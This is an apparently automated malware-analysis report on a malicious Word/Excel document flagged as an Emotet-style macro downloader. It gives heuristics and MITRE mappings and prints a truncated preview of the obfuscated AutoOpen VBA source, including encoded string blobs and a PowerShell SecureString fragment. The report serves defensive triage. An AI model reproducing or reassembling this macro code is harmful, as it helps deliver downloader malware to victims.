MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample is identified as malicious by ClamAV (Doc.Malware.Emodldr-10025032-0) and contains critical heuristics indicating the presence of auto-executing VBA macros (AutoOpen) that use CreateObject to likely download and execute a second-stage payload. The VBA macro code itself is heavily obfuscated, but the presence of the 'macros.bas' artifact and the auto-execution markers strongly suggest a downloader or droppper functionality.
Heuristics 9
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45732 bytes |
SHA-256: e50a3d0c57f1d1e0080b0cecff4742fc2b707ed908466398288781720b41e44e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 25 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BrDFLszDNdQwl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "vrVRATzumvjzbu"
Function CfZijKaRrWbs()
On Error Resume Next
For Each jTGdX In zzhXYZ
JvEDpP = 51005 - rsCDS
For Each vkJznF In jjRMHD
fKCJOa = knzlQ
Next
Next
stPMzKTDfdj = YroCp("PQA3ADcAYgA3ADQAYQA3AGYAMgA5ADIAOQBmADYAZABjADQAMQAxAPGL@Sws1", 2, 52)
For Each JoaEZE In DMYZk
pcMmr = 66455 - ufhqs
For Each snLzJM In LmrJM
CwcSmc = ulaYB
Next
Next
For Each DvwvA In ZEqliK
wHHZY = 32922 - znbiq
For Each CHJjX In iKLPpm
rBzjEz = oYljj
Next
Next
wBTvzi = YroCp("EAGMAMwA5ADkAMABiADIAOQA5ADYAMwAzAGIAOQBjADYAZgAwAGEAZgBkADYAMwA5AGQAZQBkAGYAOABkADIANQAzADcAMQBkADMAYQBlADYAOAAxAGUANQA3ADkAYgAwAGMAMwAwADMAMgBkADIAZQBkAGIAZgAxADkAOQA1ADcANwA4AdNDOl", 2, 177)
For Each owPQUR In cbRuG
EbMmr = 35460 - jZTwGX
For Each kjdVZD In pkvvvX
MPkEZq = fcmtRt
Next
Next
For Each LLPFRw In imXTVH
Jhkvi = 22021 - WdnqA
For Each qwMsV In BKRBv
oJpaVL = fdvQZ
Next
Next
XOKYuft = YroCp("hifd77BiADUAZAAzADkAMQBmAGUAZQA2ADUAZgA3ADYAYQBkAGMAOQAwADAANQAwAGYAZAA3ADMAMwA2AGYAZgBmAdjm", 7, 83)
For Each Vhbpib In QYFfZ
zJGwsj = 77491 - uBdvHb
For Each Vuvhn In AiaUjZ
iPDKAr = KYfCj
Next
Next
For Each ZuEHj In viEOz
YFfRw = 54721 - mGqVbM
For Each QvBozs In JOAdWR
qCtBS = KlqNFb
Next
Next
KiIjfJmVZt = YroCp("HDAANgBkADcAYwBmADQAYgA0AGYAOQAyADUAYwAwADEAZABlADAAMwAxAGQAYwAxADcAZgBjADgAOQBhAGQAOAAxADQAYwAxAGUAMwBmADIAOQA2AGYAMwBjAHtDLs", 2, 120)
For Each vNiZc In BsAdPQ
bPrfn = 53784 - uwDzT
For Each iTiFn In Wnwwfa
aPKqY = kLCvuL
Next
Next
For Each nLwUt In HuAmY
kDFHaz = 24292 - XRtEYB
For Each twQXk In Imiiwd
aPiOF = EmYYrm
Next
Next
aFWhrMGIGwZ = YroCp("bC7bPHKMgB8AGwAYwBIAGsAWQBwv", 8, 19)
For Each HpWRrv In DNwjPn
bQXZcU = 94333 - Inizb
For Each PUXZlt In TQQqCl
NRuwR = cVBzO
Next
Next
For Each AJMLQ In XYIVj
UvrXnf = 31545 - wokIaZ
For Each DRfwsv In pjuwmZ
zticG = baFzM
Next
Next
WCRoUToITuC = YroCp("I%iLVYgBmADAANgA0ADgAMwBhAGIAMgBiAA=='| CONverTto-SEcUrEstRInG -KE 107,14,255,180,169,48,26,16,200,134,123,115,224,73,153,89,149,125,38,2hmw", 6, 133)
For Each kaLYEl In EUHcWr
jFLcos = 82640 - wvFfT
For Each VdLim In LNiHq
vVCsR = lMcWP
Next
Next
For Each NOVibj In IGbjif
CsswS = 15980 - bUnml
For Each jiDFR In ZhzUCv
jQjtui = jaVbU
Next
Next
iRQjFOR = YroCp("P.ADQANgAyAGYAYQBhADgANQAyADAANQA4AGMANAA5AGMAOQAxAm@0tEh", 3, 49)
For Each tYmths In iJaDVS
FWEXp = 3477 - btubtI
For Each VJMblq In AvEnKF
XqcXbb = JVwlSm
Next
Next
For Each YRQRal In SzjwIC
fXcXRh = 22596 - OUbBLM
For Each dBVlh In HwEcr
tzCWP = rqpIh
Next
Next
GlXHDVpOk = YroCp(",ikwwMZA0s", 8, 1)
For Each bUuCvq In aPKWi
XUnXZX = 89299 - JSfMwM
For Each UWRUTl In NJFCO
RJicU = shDSPk
Next
Next
For Each jtcmwo In rEJIjc
shRMbU = 43815 - zIWuLc
For Each wbDiDi In kLwVP
khKzjt = BmEzt
Next
Next
zHwsibqCHp = YroCp("kMS7V7GIAZQA4AGEAMgBkADIAMAAzADUAZgBmADQAYQBlADgAYgAzAGMAYgBkADkAOQBkADcAYgA2iQJ", 7, 71)
For Each IuUQCc In CHhEB
rTzFP = 11108 - ZqSzW
For Each SYoKW In pcafP
tszvdz = wJBlD
Next
Next
For Each koHTi In zjfkmo
pOGPkR = 11760 - uPhMo
For Each DNKZa In bMjPzA
YZdtiB = POMOz
Next
Next
cirzwf = YroCp("n%qXzHA4AGYANgA1ADYAYgBlAGUAYwBlADQAZQBkADMAMQd.9", 7, 40)
For Each OFqZaH In ttSULL
EchrPk = 61006
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.